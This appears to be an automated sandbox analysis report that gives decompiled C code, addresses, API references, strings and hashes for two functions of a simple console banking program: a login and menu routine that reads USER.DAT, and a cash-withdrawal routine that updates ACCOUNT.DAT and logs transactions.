                                              Function 00D835B0, Relevance: 91.3, APIs: 27, Strings: 25, Instructions: 313COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E00D835B0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v36;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v68;
				char _v80;
				char _v92;
				char _v124;
				char _v156;
				void* __ebp;
				intOrPtr _t58;
				intOrPtr _t60;
				void* _t61;
				void* _t98;
				void* _t99;
				void* _t108;
				intOrPtr _t111;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t139;
				void* _t148;

				_t148 = __fp0;
				_t122 = __esi;
				_t121 = __edi;
				_t108 = __ebx;
				_v68 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v12 = 0;
				_v20 = 0;
				_v20 = 0;
				do {
					E00D81320(_t121, _t122, 0, 0xa, 8, 0x46, 0xf);
					E00D81250(7, 5);
					_push("Only THREE attempts shall be allowed to enter username and password.");
					E00D870FC(_t108, _t121, _t122, 0);
					E00D81250(0x17, 0xa);
					_push("Enter User name : ");
					E00D870FC(_t108, _t121, _t122, 0);
					E00D8732B("%s", 0xda2ee4);
					E00D81250(0x17, 0xc);
					_push("Password        : ");
					E00D870FC(_t108, _t121, _t122, 0);
					_t127 = _t123 + 0x14;
					E00D81290(_t121, _t122,  &_v68);
					_v20 = _v20 + 1;
					_t143 = _v20 - 3;
					if(_v20 == 3) {
						E00D82080( &_v68, _t121, _t122, _t143, _t148);
						E00D81250(0x19, 0xa);
						_push(0xd9fb98);
						E00D870FC(_t108, _t121, _t122, _t143);
						E00D81250(0x16, 0xc);
						_push("Press ENTER to exit the program...");
						E00D870FC(_t108, _t121, _t122, _t143);
						_t127 = _t127 + 8;
						E00D87751(0);
					}
					_v12 = 0;
					_t58 = E00D86E91("USER.DAT", "r");
					_t128 = _t127 + 8;
					 *0xda2f28 = _t58;
					while(1) {
						_push( &_v156);
						_push( &_v124);
						_t60 =  *0xda2f28; // 0x0
						_t61 = E00D86FC1(_t60, "%s %s %s\n",  &_v92);
						_t129 = _t128 + 0x14;
						if(_t61 == 0xffffffff) {
							break;
						}
						_t98 = E00D881D0(0xda2ee4,  &_v124);
						_t128 = _t129 + 8;
						if(_t98 == 0) {
							_t99 = E00D881D0(0xda2f02,  &_v156);
							_t128 = _t128 + 8;
							if(_t99 == 0) {
								_v12 = _v12 + 1;
							}
						}
					}
					_t111 =  *0xda2f28; // 0x0
					_push(_t111);
					E00D86D56(_t108, _t121, _t122, __eflags);
					_t130 = _t129 + 4;
					E00D82080(_t111, _t121, _t122, __eflags, _t148);
					__eflags = _v12;
					if(__eflags == 0) {
						goto L10;
					}
					break;
					L10:
					E00D81250(0xa, 0xa);
					_push(0xd9fbf8);
					E00D870FC(_t108, _t121, _t122, __eflags);
					_t123 = _t130 + 4;
					__eflags = 1;
				} while (1 != 0);
				E00D883B7(__eflags,  &_v80);
				_t131 = _t130 + 4;
				E00D83A50(_t108, _t121, _t122, _t148);
				do {
					E00D82080(_t111, _t121, _t122, __eflags, _t148);
					E00D81250(0xf, 8);
					_push("1. Create New Account\n");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0xf, 0xa);
					_push("2. Cash Deposit");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0xf, 0xc);
					_push("3. Cash Withdrawl");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0xf, 0xe);
					_push("4. Fund Transfer");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0xf, 0x10);
					_push("5. Account information");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0x2d, 8);
					_push("6. Transaction information");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0x2d, 0xa);
					_push("7. Log out");
					E00D870FC(_t108, _t121, _t122, __eflags);
					E00D81250(0x2d, 0xc);
					_push("8. Exit");
					E00D870FC(_t108, _t121, _t122, __eflags);
					_t139 = _t131 + 0x20;
					E00D81250(1, 0x11);
					_v24 = 0;
					while(1) {
						__eflags = _v24 - 0x4e;
						if(__eflags >= 0) {
							break;
						}
						_push("_");
						E00D870FC(_t108, _t121, _t122, __eflags);
						_t139 = _t139 + 4;
						_t111 = _v24 + 1;
						__eflags = _t111;
						_v24 = _t111;
					}
					E00D81250(0x17, 0x13);
					_push("Press a choice between the range [1-8] ");
					E00D870FC(_t108, _t121, _t122, __eflags);
					_t131 = _t139 + 4;
					_v16 = 0x30;
					_v16 = _v16 - 1;
					__eflags = _v16 - 7;
					if(__eflags > 0) {
						E00D82080(_t111, _t121, _t122, __eflags, _t148);
						E00D81250(0xa, 0xa);
						_push("Your input is out of range! Enter a choice between 1 to 8!");
						E00D870FC(_t108, _t121, _t122, __eflags);
						E00D81250(0xf, 0xc);
						_push("Press any key to return to main menu...");
						E00D870FC(_t108, _t121, _t122, __eflags);
						_t131 = _t131 + 8;
					} else {
						switch( *((intOrPtr*)(_v16 * 4 +  &M00D83A28))) {
							case 0:
								E00D83D80(_t108, _t111, _t121, _t122, __eflags, _t148);
								goto L35;
							case 1:
								__eax = E00D845E0(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
								goto L35;
							case 2:
								__eax = E00D84980(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
								goto L35;
							case 3:
								__eax = E00D84E30(__ebx, __edi, __esi, __eflags, __fp0);
								goto L35;
							case 4:
								__eax = E00D855A0(__ebx, __ecx, __eflags, __fp0);
								goto L35;
							case 5:
								__eax = E00D86130(__ebx, __ecx, __edx, __fp0);
								goto L35;
							case 6:
								E00D82080(__ecx, __edi, __esi, __eflags, __fp0) = E00D81250(0xf, 0xa);
								_push("Are you sure you want to Log out? <Y/N> : ");
								__eax = E00D870FC(__ebx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								__ecx = _v5;
								__eflags = __ecx - 0x59;
								if(__eflags == 0) {
									L28:
									_t40 =  &_v36; // -15
									_t40 = E00D883B7(__eflags, _t40);
									 *0xda2f28 = E00D86E91("LOG.DAT", "a");
									_t41 =  &_v36; // -15
									__ecx = _t41;
									_push(_t41);
									_t42 =  &_v80; // -59
									__edx = _t42;
									_push(_t42);
									_push(0xda2f40);
									_push(0xda2ee0);
									_push("%s %s %s %s\n");
									__eax =  *0xda2f28; // 0x0
									_push(__eax);
									__eax = E00D86EA6(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 0x18;
									__ecx =  *0xda2f28; // 0x0
									_push(__ecx);
									__eax = E00D86D56(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 4;
									__eax = E00D835B0(__ebx, __edi, __esi, __fp0);
								} else {
									__edx = _v5;
									__eflags = _v5 - 0x79;
									if(__eflags == 0) {
										goto L28;
									}
								}
								goto L35;
							case 7:
								E00D82080(__ecx, __edi, __esi, __eflags, __fp0) = E00D81250(0xf, 0xa);
								_push("Are you sure you want to exit? <Y/N> : ");
								__eax = E00D870FC(__ebx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								__edx = _v5;
								__eflags = _v5 - 0x59;
								if(__eflags == 0) {
									L32:
									_t45 =  &_v36; // -15
									__ecx = _t45;
									__eax = E00D883B7(__eflags, _t45);
									 *0xda2f28 = E00D86E91("LOG.DAT", "a");
									_t46 =  &_v36; // -15
									__edx = _t46;
									_push(_t46);
									_t47 =  &_v80; // -59
									__eax = _t47;
									_push(_t47);
									_push(0xda2f40);
									_push(0xda2ee0);
									_push("%s %s %s %s\n");
									__ecx =  *0xda2f28; // 0x0
									_push(__ecx);
									__eax = E00D86EA6(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 0x18;
									__edx =  *0xda2f28; // 0x0
									_push(__edx);
									__eax = E00D86D56(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 4;
									__eax = E00D87751(0);
								} else {
									__eax = _v5;
									__eflags = _v5 - 0x79;
									if(__eflags == 0) {
										goto L32;
									}
								}
								goto L35;
						}
					}
					L35:
					__eflags = 1;
				} while (1 != 0);
				return 1;
			}








































                                              0x00d835b0
                                              0x00d835b0
                                              0x00d835b0
                                              0x00d835b0
                                              0x00d835b9
                                              0x00d835bf
                                              0x00d835c2
                                              0x00d835c5
                                              0x00d835c8
                                              0x00d835cb
                                              0x00d835ce
                                              0x00d835d1
                                              0x00d835d4
                                              0x00d835d7
                                              0x00d835de
                                              0x00d835e5
                                              0x00d835ec
                                              0x00d835f4
                                              0x00d835fd
                                              0x00d83602
                                              0x00d83607
                                              0x00d83613
                                              0x00d83618
                                              0x00d8361d
                                              0x00d8362f
                                              0x00d8363b
                                              0x00d83640
                                              0x00d83645
                                              0x00d8364a
                                              0x00d83651
                                              0x00d8365c
                                              0x00d8365f
                                              0x00d83663
                                              0x00d83665
                                              0x00d8366e
                                              0x00d83673
                                              0x00d83678
                                              0x00d83684
                                              0x00d83689
                                              0x00d8368e
                                              0x00d83693
                                              0x00d83698
                                              0x00d83698
                                              0x00d8369d
                                              0x00d836ae
                                              0x00d836b3
                                              0x00d836b6
                                              0x00d836bb
                                              0x00d836c1
                                              0x00d836c5
                                              0x00d836cf
                                              0x00d836d5
                                              0x00d836da
                                              0x00d836e0
                                              0x00000000
                                              0x00000000
                                              0x00d836eb
                                              0x00d836f0
                                              0x00d836f5
                                              0x00d83703
                                              0x00d83708
                                              0x00d8370d
                                              0x00d83715
                                              0x00d83715
                                              0x00d8370d
                                              0x00d83718
                                              0x00d8371a
                                              0x00d83720
                                              0x00d83721
                                              0x00d83726
                                              0x00d83729
                                              0x00d8372e
                                              0x00d83732
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d83734
                                              0x00d83738
                                              0x00d8373d
                                              0x00d83742
                                              0x00d83747
                                              0x00d83753
                                              0x00d83753
                                              0x00d8375f
                                              0x00d83764
                                              0x00d83767
                                              0x00d8376c
                                              0x00d8376c
                                              0x00d83775
                                              0x00d8377a
                                              0x00d8377f
                                              0x00d8378b
                                              0x00d83790
                                              0x00d83795
                                              0x00d837a1
                                              0x00d837a6
                                              0x00d837ab
                                              0x00d837b7
                                              0x00d837bc
                                              0x00d837c1
                                              0x00d837cd
                                              0x00d837d2
                                              0x00d837d7
                                              0x00d837e3
                                              0x00d837e8
                                              0x00d837ed
                                              0x00d837f9
                                              0x00d837fe
                                              0x00d83803
                                              0x00d8380f
                                              0x00d83814
                                              0x00d83819
                                              0x00d8381e
                                              0x00d83825
                                              0x00d8382a
                                              0x00d8383c
                                              0x00d8383c
                                              0x00d83840
                                              0x00000000
                                              0x00000000
                                              0x00d83842
                                              0x00d83847
                                              0x00d8384c
                                              0x00d83836
                                              0x00d83836
                                              0x00d83839
                                              0x00d83839
                                              0x00d83855
                                              0x00d8385a
                                              0x00d8385f
                                              0x00d83864
                                              0x00d83867
                                              0x00d83874
                                              0x00d83877
                                              0x00d8387b
                                              0x00d839e3
                                              0x00d839ec
                                              0x00d839f1
                                              0x00d839f6
                                              0x00d83a02
                                              0x00d83a07
                                              0x00d83a0c
                                              0x00d83a11
                                              0x00d83881
                                              0x00d83884
                                              0x00000000
                                              0x00d8388b
                                              0x00000000
                                              0x00000000
                                              0x00d83895
                                              0x00000000
                                              0x00000000
                                              0x00d8389f
                                              0x00000000
                                              0x00000000
                                              0x00d838a9
                                              0x00000000
                                              0x00000000
                                              0x00d838b3
                                              0x00000000
                                              0x00000000
                                              0x00d838bd
                                              0x00000000
                                              0x00000000
                                              0x00d838d0
                                              0x00d838d5
                                              0x00d838da
                                              0x00d838df
                                              0x00d838e2
                                              0x00d838e6
                                              0x00d838e9
                                              0x00d838f4
                                              0x00d838f4
                                              0x00d838f8
                                              0x00d83912
                                              0x00d83917
                                              0x00d83917
                                              0x00d8391a
                                              0x00d8391b
                                              0x00d8391b
                                              0x00d8391e
                                              0x00d8391f
                                              0x00d83924
                                              0x00d83929
                                              0x00d8392e
                                              0x00d83933
                                              0x00d83934
                                              0x00d83939
                                              0x00d8393c
                                              0x00d83942
                                              0x00d83943
                                              0x00d83948
                                              0x00d8394b
                                              0x00d838eb
                                              0x00d838eb
                                              0x00d838ef
                                              0x00d838f2
                                              0x00000000
                                              0x00000000
                                              0x00d838f2
                                              0x00000000
                                              0x00000000
                                              0x00d8395e
                                              0x00d83963
                                              0x00d83968
                                              0x00d8396d
                                              0x00d83970
                                              0x00d83974
                                              0x00d83977
                                              0x00d83982
                                              0x00d83982
                                              0x00d83982
                                              0x00d83986
                                              0x00d839a0
                                              0x00d839a5
                                              0x00d839a5
                                              0x00d839a8
                                              0x00d839a9
                                              0x00d839a9
                                              0x00d839ac
                                              0x00d839ad
                                              0x00d839b2
                                              0x00d839b7
                                              0x00d839bc
                                              0x00d839c2
                                              0x00d839c3
                                              0x00d839c8
                                              0x00d839cb
                                              0x00d839d1
                                              0x00d839d2
                                              0x00d839d7
                                              0x00d839dc
                                              0x00d83979
                                              0x00d83979
                                              0x00d8397d
                                              0x00d83980
                                              0x00000000
                                              0x00000000
                                              0x00d83980
                                              0x00000000
                                              0x00000000
                                              0x00d83884
                                              0x00d83a14
                                              0x00d83a19
                                              0x00d83a19
                                              0x00d83a24

                                              APIs
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8133D
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8137B
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8139C
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81410
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81433
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D83607
                                              • _wprintf.LIBCMT ref: 00D8361D
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wscanf.LIBCMT ref: 00D8362F
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                              • _wprintf.LIBCMT ref: 00D83645
                                                • Part of subcall function 00D81290: _wprintf.LIBCMT ref: 00D812C9
                                              • _wprintf.LIBCMT ref: 00D83678
                                              • _wprintf.LIBCMT ref: 00D83803
                                              • _wprintf.LIBCMT ref: 00D83819
                                              • _wprintf.LIBCMT ref: 00D83847
                                                • Part of subcall function 00D83D80: _wprintf.LIBCMT ref: 00D83DC1
                                                • Part of subcall function 00D83D80: _wprintf.LIBCMT ref: 00D83DF4
                                                • Part of subcall function 00D83D80: _wprintf.LIBCMT ref: 00D83E0C
                                                • Part of subcall function 00D83D80: _wscanf.LIBCMT ref: 00D83E20
                                                • Part of subcall function 00D83D80: _wscanf.LIBCMT ref: 00D83E34
                                                • Part of subcall function 00D83D80: _wprintf.LIBCMT ref: 00D83E4A
                                                • Part of subcall function 00D83D80: _wscanf.LIBCMT ref: 00D83E5B
                                                • Part of subcall function 00D83D80: _wprintf.LIBCMT ref: 00D83E71
                                                • Part of subcall function 00D83D80: _wscanf.LIBCMT ref: 00D83E82
                                              • _wprintf.LIBCMT ref: 00D8385F
                                              • _wprintf.LIBCMT ref: 00D8368E
                                                • Part of subcall function 00D87751: _doexit.LIBCMT ref: 00D8775B
                                              • _swscanf.LIBCMT ref: 00D836D5
                                              • _wprintf.LIBCMT ref: 00D83742
                                              • __wstrtime.LIBCMT ref: 00D8375F
                                              • _wprintf.LIBCMT ref: 00D8377F
                                              • _wprintf.LIBCMT ref: 00D83795
                                              • _wprintf.LIBCMT ref: 00D837AB
                                              • _wprintf.LIBCMT ref: 00D837C1
                                              • _wprintf.LIBCMT ref: 00D837D7
                                              • _wprintf.LIBCMT ref: 00D837ED
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$_wscanf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                              • String ID: %s %s %s$%s %s %s %s$%s %s %s %s$0$1. Create New Account$2. Cash Deposit$3. Cash Withdrawl$4. Fund Transfer$5. Account information$6. Transaction information$7. Log out$8. Exit$Are you sure you want to Log out? <Y/N> : $Are you sure you want to exit? <Y/N> : $Enter User name : $LOG.DAT$LOG.DAT$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to exit the program...$Press a choice between the range [1-8] $Press any key to return to main menu...$USER.DAT$Your input is out of range! Enter a choice between 1 to 8!
                                              • API String ID: 1611355571-1720101819
                                              • Opcode ID: 0e7d5c12990418675da693413f6fe967d808c49bc0045fce08a784786632eeaf
                                              • Instruction ID: 9b52833a56aaceef58b42834f6c46fb26673c79487fcf4c9df83a205b8a98764
                                              • Opcode Fuzzy Hash: 0e7d5c12990418675da693413f6fe967d808c49bc0045fce08a784786632eeaf
                                              • Instruction Fuzzy Hash: 47A15FB1E84305AAEB10B7A49C43BAE7274DF51F14F144035F609B92C2EAB1E61D877B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D84980, Relevance: 65.1, APIs: 17, Strings: 20, Instructions: 328COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 43%
                                              			E00D84980(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v42;
				char _v62;
				char _v112;
				char _v113;
				char _v125;
				char _v140;
				char _v170;
				char _v200;
				char _v208;
				char _v244;
				char _v324;
				char _v376;
				char _v456;
				void* __ebp;
				intOrPtr _t64;
				intOrPtr _t70;
				intOrPtr _t75;
				void* _t76;
				intOrPtr _t77;
				void* _t81;
				char _t97;
				intOrPtr _t99;
				void* _t104;
				intOrPtr _t105;
				intOrPtr _t110;
				void* _t117;
				void* _t122;
				void* _t127;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr _t168;
				intOrPtr _t173;
				void* _t177;
				void* _t180;
				void* _t184;
				void* _t185;
				void* _t193;
				void* _t195;
				void* _t196;
				void* _t205;

				_t215 = __fp0;
				_t176 = __esi;
				_t175 = __edi;
				_t132 = __ecx;
				_t131 = __ebx;
				_v16 = 0;
				E00D82080(__ecx, __edi, __esi, __eflags, __fp0);
				E00D81250(5, 0xa);
				_push("Withdraw from A/C number          : ");
				E00D870FC(__ebx, __edi, __esi, __eflags);
				E00D8732B("%s",  &_v28);
				_t64 = E00D86E91("ACCOUNT.DAT", "r");
				_t180 = _t177 + 0x14;
				 *0xda2f28 = _t64;
				_t214 = _v16;
				if(_v16 == 0) {
					E00D82080(_t132, __edi, __esi, _t214, __fp0);
					E00D81250(0x14, 0xc);
					_push("Given A/C number does not exits!");
					return E00D870FC(__ebx, _t175, _t176, _t214);
				}
				E00D81250(0x32, 0xa);
				_push( &_v376);
				_push("[ %s ]");
				E00D870FC(__ebx, __edi, __esi, __eflags);
				E00D81250(5, 0xc);
				_push("Amount to be Withdrawn (in NRs.)  : ");
				E00D870FC(__ebx, _t175, _t176, __eflags);
				E00D8732B("%f",  &_v12);
				_t70 = E00D86E91("ACCOUNT.DAT", "r");
				_t184 = _t180 + 0x1c;
				 *0xda2f28 = _t70;
				_v16 = 0;
				while(1) {
					_push( &_v32);
					_push( &_v36);
					_push( &_v40);
					_push( &_v42);
					_push( &_v140);
					_push( &_v113);
					_push( &_v62);
					_push( &_v112);
					_push( &_v125);
					_push( &_v170);
					_push( &_v200);
					_t75 =  *0xda2f28; // 0x0
					_t76 = E00D86FC1(_t75, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
					_t185 = _t184 + 0x38;
					__eflags = _t76 - 0xffffffff;
					if(__eflags == 0) {
						break;
					}
					_t122 = E00D881D0( &_v208,  &_v28);
					_t184 = _t185 + 8;
					__eflags = _t122;
					if(__eflags == 0) {
						asm("movss xmm0, [ebp-0x8]");
						asm("comiss xmm0, [ebp-0x1c]");
						if(__eflags > 0) {
							E00D82080( &_v28, _t175, _t176, __eflags, _t215);
							E00D81250(0x14, 0xc);
							asm("cvtss2sd xmm0, [ebp-0x1c]");
							asm("movsd [esp], xmm0");
							_push("Sorry, the current balance is Rs. %.2f only!");
							E00D870FC(_t131, _t175, _t176, __eflags);
							E00D81250(0x19, 0xe);
							_push("Transaction NOT completed!");
							_t127 = E00D870FC(_t131, _t175, _t176, __eflags);
							_v16 = 1;
							return _t127;
						}
					}
				}
				_t77 =  *0xda2f28; // 0x0
				_push(_t77);
				E00D86D56(_t131, _t175, _t176, __eflags);
				E00D82080( &_v200, _t175, _t176, __eflags, _t215);
				E00D81250(0x1e, 0xa);
				_push("Confirm Transaction");
				_t81 = E00D870FC(_t131, _t175, _t176, __eflags);
				asm("movss xmm0, [ebp-0x8]");
				asm("movss [esp], xmm0");
				E00D81810(_t81,  &_v244);
				E00D81250(3, 0xc);
				_push( &_v376);
				_push( &_v28);
				E00D870FC(_t131, _t175, _t176, __eflags);
				asm("cvtss2sd xmm0, [ebp-0x8]");
				asm("movsd [esp], xmm0");
				E00D81AD0( &_v456, "%s to be Withdrawn from A/C number : %s [%s]",  &_v244);
				E00D880E0( &_v324,  &_v456);
				E00D880E0( &_v324, "]");
				E00D81250(0x28 - (E00D88260( &_v324) >> 1), 0xe);
				_push( &_v324);
				E00D871C9(_t131, _t175, _t176, __eflags);
				E00D81250(8, 0x11);
				_push("Are you sure you want to perform this tranasction? <Y/N>");
				E00D870FC(_t131, _t175, _t176, __eflags);
				_t193 = _t185 + 0x14 - 8 + 0x1c;
				_t97 = _v5;
				__eflags = _t97 - 0x59;
				if(_t97 == 0x59) {
					L10:
					 *0xda2f28 = E00D86E91("ACCOUNT.DAT", "r");
					_t99 = E00D86E91("TEMP.DAT", "w");
					_t195 = _t193 + 0x10;
					 *0xda2f24 = _t99;
					_v16 = 0;
					while(1) {
						_push( &_v32);
						_push( &_v36);
						_push( &_v40);
						_push( &_v42);
						_push( &_v140);
						_push( &_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_t168 =  *0xda2f28; // 0x0
						_t104 = E00D86FC1(_t168, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
						_t196 = _t195 + 0x38;
						__eflags = _t104 - 0xffffffff;
						if(__eflags == 0) {
							break;
						}
						_t117 = E00D881D0( &_v208,  &_v28);
						_t205 = _t196 + 8;
						__eflags = _t117;
						if(__eflags == 0) {
							asm("movss xmm0, [ebp-0x24]");
							asm("subss xmm0, [ebp-0x8]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [0xd98210]");
						asm("comiss xmm0, [ebp-0x24]");
						if(__eflags > 0) {
							asm("movss xmm0, [ebp-0x20]");
							asm("addss xmm0, [ebp-0x24]");
							asm("movss [ebp-0x20], xmm0");
							asm("movss xmm0, [0xd98210]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [ebp-0x24]");
						asm("addss xmm0, [ebp-0x20]");
						asm("movss [ebp-0x1c], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x1c]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x20]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x24]");
						asm("movsd [esp], xmm0");
						_push(_v42);
						_push( &_v140);
						_push(_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_push( &_v208);
						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t173 =  *0xda2f24; // 0x0
						_push(_t173);
						E00D86EA6(_t131, _t175, _t176, __eflags);
						_t195 = _t205 - 0xfffffffffffffff8 + 0x44;
					}
					_t105 =  *0xda2f24; // 0x0
					_push(_t105);
					E00D86D56(_t131, _t175, _t176, __eflags);
					_t147 =  *0xda2f28; // 0x0
					_push(_t147);
					E00D86D56(_t131, _t175, _t176, __eflags);
					 *0xda2f28 = E00D86E91("TRANSACTION.DAT", "a");
					E00D883B7(__eflags, 0xda2f30);
					_push(0xda2ee4);
					asm("cvtss2sd xmm0, [ebp-0x8]");
					asm("movsd [esp], xmm0");
					_push(0xda2f30);
					_push(0xda2f40);
					_push("Cash+Withdrawn");
					_push( &_v28);
					_push("%s %s %s %s %.2f %s\n");
					_t110 =  *0xda2f28; // 0x0
					_push(_t110);
					E00D86EA6(_t131, _t175, _t176, __eflags);
					_t148 =  *0xda2f28; // 0x0
					_push(_t148);
					E00D86D56(_t131, _t175, _t176, __eflags);
					E00D82080(_t148, _t175, _t176, __eflags, _t215);
					E00D81250(0x14, 0xc);
					_push("Transaction completed successfully!");
					return E00D870FC(_t131, _t175, _t176, __eflags);
				}
				__eflags = _v5 - 0x79;
				if(_v5 == 0x79) {
					goto L10;
				}
				return _t97;
			}


















































                                              0x00d84980
                                              0x00d84980
                                              0x00d84980
                                              0x00d84980
                                              0x00d84980
                                              0x00d84989
                                              0x00d84990
                                              0x00d84999
                                              0x00d8499e
                                              0x00d849a3
                                              0x00d849b4
                                              0x00d849c6
                                              0x00d849cb
                                              0x00d849ce
                                              0x00d849d3
                                              0x00d849d7
                                              0x00d849d9
                                              0x00d849e2
                                              0x00d849e7
                                              0x00000000
                                              0x00d849f1
                                              0x00d849fd
                                              0x00d84a08
                                              0x00d84a09
                                              0x00d84a0e
                                              0x00d84a1a
                                              0x00d84a1f
                                              0x00d84a24
                                              0x00d84a35
                                              0x00d84a47
                                              0x00d84a4c
                                              0x00d84a4f
                                              0x00d84a54
                                              0x00d84a5b
                                              0x00d84a5e
                                              0x00d84a62
                                              0x00d84a66
                                              0x00d84a6a
                                              0x00d84a71
                                              0x00d84a75
                                              0x00d84a79
                                              0x00d84a7d
                                              0x00d84a81
                                              0x00d84a88
                                              0x00d84a8f
                                              0x00d84a9c
                                              0x00d84aa2
                                              0x00d84aa7
                                              0x00d84aaa
                                              0x00d84aad
                                              0x00000000
                                              0x00000000
                                              0x00d84aba
                                              0x00d84abf
                                              0x00d84ac2
                                              0x00d84ac4
                                              0x00d84ac6
                                              0x00d84acb
                                              0x00d84acf
                                              0x00d84ad1
                                              0x00d84ada
                                              0x00d84adf
                                              0x00d84ae7
                                              0x00d84aec
                                              0x00d84af1
                                              0x00d84afd
                                              0x00d84b02
                                              0x00d84b07
                                              0x00d84b0f
                                              0x00000000
                                              0x00d84b0f
                                              0x00d84acf
                                              0x00d84b1b
                                              0x00d84b20
                                              0x00d84b25
                                              0x00d84b26
                                              0x00d84b2e
                                              0x00d84b37
                                              0x00d84b3c
                                              0x00d84b41
                                              0x00d84b46
                                              0x00d84b4b
                                              0x00d84b57
                                              0x00d84b60
                                              0x00d84b6b
                                              0x00d84b6f
                                              0x00d84b7c
                                              0x00d84b8b
                                              0x00d84b93
                                              0x00d84b98
                                              0x00d84bab
                                              0x00d84bbf
                                              0x00d84be2
                                              0x00d84bed
                                              0x00d84bee
                                              0x00d84bfa
                                              0x00d84bff
                                              0x00d84c04
                                              0x00d84c09
                                              0x00d84c0c
                                              0x00d84c10
                                              0x00d84c13
                                              0x00d84c22
                                              0x00d84c34
                                              0x00d84c43
                                              0x00d84c48
                                              0x00d84c4b
                                              0x00d84c50
                                              0x00d84c57
                                              0x00d84c5a
                                              0x00d84c5e
                                              0x00d84c62
                                              0x00d84c66
                                              0x00d84c6d
                                              0x00d84c71
                                              0x00d84c75
                                              0x00d84c79
                                              0x00d84c7d
                                              0x00d84c84
                                              0x00d84c8b
                                              0x00d84c98
                                              0x00d84c9f
                                              0x00d84ca4
                                              0x00d84ca7
                                              0x00d84caa
                                              0x00000000
                                              0x00000000
                                              0x00d84cbb
                                              0x00d84cc0
                                              0x00d84cc3
                                              0x00d84cc5
                                              0x00d84cc7
                                              0x00d84ccc
                                              0x00d84cd1
                                              0x00d84cd1
                                              0x00d84cd6
                                              0x00d84cde
                                              0x00d84ce2
                                              0x00d84ce4
                                              0x00d84ce9
                                              0x00d84cee
                                              0x00d84cf3
                                              0x00d84cfb
                                              0x00d84cfb
                                              0x00d84d00
                                              0x00d84d05
                                              0x00d84d0a
                                              0x00d84d0f
                                              0x00d84d17
